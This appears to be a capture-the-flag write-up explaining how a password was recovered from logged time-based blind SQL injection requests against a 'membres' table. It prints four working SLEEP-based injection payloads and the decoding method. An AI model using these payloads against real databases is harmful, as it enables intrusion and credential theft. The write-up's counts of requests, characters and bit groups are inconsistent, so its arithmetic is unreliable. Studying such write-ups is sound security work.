Convert URL to base64:

1. SELECT (CASE FIELD(CONCAT(SUBSTRING(BIN(ASCII(SUBSTRING(PASSWORD,1,1))),1,1),SUBSTRING(BIN(ASCII(SUBSTRING(PASSWORD,1,1))),2,1))
,CONCAT(CHAR(48),CHAR(48)),CONCAT(CHAR(48),CHAR(49)),CONCAT(CHAR(49),CHAR(48)),CONCAT(CHAR(49),CHAR(49)))WHEN 1 THEN TRUE WHEN 2
THEN SLEEP(2) WHEN 3 THEN SLEEP(4) WHEN 4 THEN SLEEP(6) END) FROM membres WHERE id=1

2. SELECT (CASE FIELD(CONCAT(SUBSTRING(BIN(ASCII(SUBSTRING(PASSWORD,1,1))),3,1),SUBSTRING(BIN(ASCII(SUBSTRING(PASSWORD,1,1))),4,1))
,CONCAT(CHAR(48),CHAR(48)),CONCAT(CHAR(48),CHAR(49)),CONCAT(CHAR(49),CHAR(48)),CONCAT(CHAR(49),CHAR(49)))WHEN 1 THEN TRUE WHEN 2
THEN SLEEP(2) WHEN 3 THEN SLEEP(4) WHEN 4 THEN SLEEP(6) END) FROM membres WHERE id=1

3. SELECT (CASE FIELD(CONCAT(SUBSTRING(BIN(ASCII(SUBSTRING(PASSWORD,1,1))),5,1),SUBSTRING(BIN(ASCII(SUBSTRING(PASSWORD,1,1))),6,1))
,CONCAT(CHAR(48),CHAR(48)),CONCAT(CHAR(48),CHAR(49)),CONCAT(CHAR(49),CHAR(48)),CONCAT(CHAR(49),CHAR(49)))WHEN 1 THEN TRUE WHEN 2
THEN SLEEP(2) WHEN 3 THEN SLEEP(4) WHEN 4 THEN SLEEP(6) END) FROM membres WHERE id=1

4. SELECT (CASE FIELD(CONCAT(SUBSTRING(BIN(ASCII(SUBSTRING(PASSWORD,1,1))),7,1)),CHAR(48),CHAR(49)) WHEN 1 THEN SLEEP(2) WHEN 2 THEN
SLEEP(4) END) FROM membres WHERE id=1

ASCII character value contains 8 bits but usually 7 bits are enough to identify the character.
Here the code is to find analyze the password bit by bit. The first 3 URL strings are to identify the first 6 bits(2 in pair)
of the character by comparing it with (00,01,10,11). And the 4th URL to identify the 7th bit of the character by compairing 
with 0 and 1.
Hence, a set of 5 URLS belongs to an alphabet of the password. In total there are 40 URLS in logs so the passsword retrieved
will be of 20 characters.

Upon calculating the time difference between each consecutive logs and compairing with 2 sec|4 sec|6 sec for first 6 bits and 
compairing with 2 sec| 4 sec for the 7th bit will give you the binary values.

1100111 111001 1010101 1010111 1000100 111000 1000101 1011010 1100111 1000010 1101000
1101000 1000010 1110000 1100011 110100 1101110 1010100 1010011 1000001 1010011 000000


So use the time difference between two requests to recontruct the password. And you should use script to do so 
but I did it manually(nothing productive LOL!!).

#g9UWD8EZgBhBpc4nTSAS


